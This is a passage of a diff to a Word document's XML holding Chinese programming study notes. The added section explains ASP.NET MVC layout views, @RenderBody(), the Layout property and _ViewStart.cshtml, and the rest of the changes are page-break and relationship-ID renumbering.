+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>h2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        View ASP.NET MVC</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>h2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>body</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>其中@RenderBody()会调用动作方法所指定的视图内容，并插入到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>具体视图</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>接着我们在在具体视图</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中，指定Layout属性为这个布局视图的路径</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Layout = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="A31515"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>"~/Views/_BasicLayout.cshtml"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>但这里还有一个问题，就是必须要为每一个视图</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>指定布局文件。这意味着如果修改了布局视图的名称，就必须修改所有引用了该布局的视图。这是易错的过程，不符合</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>MVC易于维护的主题。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>我们可以通过</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>使用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>视图起始文件</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>，来解决该问题。在渲染一个视图时，MVC框架会查找一个叫做</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>_ViewStart.cshtml</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>的文件，该文件</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>默认加</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>载到视图中</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>，除非指定视图的Layout为Null。</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13934,7 +16106,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>System.ComponentModel.DataAnnotations.DataTypeAttribute</w:t>
       </w:r>
     </w:p>
@@ -14821,6 +16992,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>数据库分库、拆表、分布式、集群、备份、故障调控等方案</w:t>
       </w:r>
     </w:p>
@@ -15193,7 +17365,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>幻读</w:t>
       </w:r>
     </w:p>
@@ -15858,6 +18029,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2768012"/>
@@ -15876,7 +18048,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14" cstate="print"/>
+                    <a:blip r:embed="rId15" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -15913,7 +18085,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="1845960"/>
@@ -15932,7 +18103,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15" cstate="print"/>
+                    <a:blip r:embed="rId16" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -15994,7 +18165,7 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
       </w:pPr>
-      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -16007,7 +18178,7 @@
       <w:r>
         <w:t>和</w:t>
       </w:r>
-      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -16043,7 +18214,7 @@
       <w:r>
         <w:t>维护的数据库软件。</w:t>
       </w:r>
-      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -16094,7 +18265,7 @@
       <w:r>
         <w:t>作为广泛使用的</w:t>
       </w:r>
-      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -16224,6 +18395,7 @@
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>OS X</w:t>
       </w:r>
     </w:p>
@@ -16387,7 +18559,6 @@
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>SQL Server</w:t>
       </w:r>
       <w:r>
@@ -17140,6 +19311,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>总结</w:t>
       </w:r>
     </w:p>
@@ -17266,7 +19438,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>MongoDb</w:t>
       </w:r>
       <w:r>
@@ -17538,7 +19709,7 @@
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId20" w:anchor="atlas" w:history="1">
+      <w:hyperlink r:id="rId21" w:anchor="atlas" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -18442,6 +20613,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>包含</w:t>
       </w:r>
       <w:r>
@@ -18818,7 +20990,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>求模</w:t>
       </w:r>
       <w:r>
@@ -20057,7 +22228,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>例子：</w:t>
       </w:r>
       <w:r>
@@ -20845,6 +23015,7 @@
           <w:b/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>分布式文件系统</w:t>
       </w:r>
     </w:p>
@@ -21092,7 +23263,7 @@
       <w:pPr>
         <w:widowControl/>
       </w:pPr>
-      <w:hyperlink r:id="rId21" w:history="1">
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -21419,7 +23590,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22" cstate="print"/>
+                    <a:blip r:embed="rId23" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -21538,6 +23709,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>{</w:t>
       </w:r>
     </w:p>
@@ -21814,7 +23986,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t>{</w:t>
       </w:r>
@@ -22287,7 +24458,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23" cstate="print"/>
+                    <a:blip r:embed="rId24" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -24631,7 +26802,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24" cstate="print"/>
+                    <a:blip r:embed="rId25" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -25977,7 +28148,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25" cstate="print"/>
+                    <a:blip r:embed="rId26" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -26029,7 +28200,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId26" w:anchor="undefined" w:history="1">
+      <w:hyperlink r:id="rId27" w:anchor="undefined" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -26048,7 +28219,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId27" w:history="1">
+      <w:hyperlink r:id="rId28" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -26067,7 +28238,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId28" w:history="1">
+      <w:hyperlink r:id="rId29" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -26866,7 +29037,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId29" w:history="1">
+      <w:hyperlink r:id="rId30" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -26891,7 +29062,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId30" w:history="1">
+      <w:hyperlink r:id="rId31" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -27778,7 +29949,7 @@
         </w:rPr>
         <w:t>cookie只对指定域有效。所有向该域发送的请求都会包含该cookie信息。这个值可以包含子域(如：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId31" w:history="1">
+      <w:hyperlink r:id="rId32" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -27869,7 +30040,7 @@
         </w:rPr>
         <w:t>对于指定域中的那个路径，应该向服务器发送cookie。例如：你可以指定向</w:t>
       </w:r>
-      <w:hyperlink r:id="rId32" w:history="1">
+      <w:hyperlink r:id="rId33" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -27888,7 +30059,7 @@
         </w:rPr>
         <w:t>发送cookie，而</w:t>
       </w:r>
-      <w:hyperlink r:id="rId33" w:history="1">
+      <w:hyperlink r:id="rId34" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -28054,7 +30225,7 @@
           <w:szCs w:val="44"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId34" w:history="1">
+      <w:hyperlink r:id="rId35" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -28605,7 +30776,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId35" w:history="1">
+      <w:hyperlink r:id="rId36" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -28712,7 +30883,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36" cstate="print"/>
+                    <a:blip r:embed="rId37" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -28831,7 +31002,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId37" w:history="1">
+      <w:hyperlink r:id="rId38" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -28856,7 +31027,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId38" w:history="1">
+      <w:hyperlink r:id="rId39" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -30860,7 +33031,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39" cstate="print"/>
+                    <a:blip r:embed="rId40" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -31071,7 +33242,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40" cstate="print"/>
+                    <a:blip r:embed="rId41" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -31145,7 +33316,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41" cstate="print"/>
+                    <a:blip r:embed="rId42" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -31216,7 +33387,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42" cstate="print"/>
+                    <a:blip r:embed="rId43" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -32161,7 +34332,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId43" w:history="1">
+      <w:hyperlink r:id="rId44" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -32219,7 +34390,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId44" w:history="1">
+      <w:hyperlink r:id="rId45" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
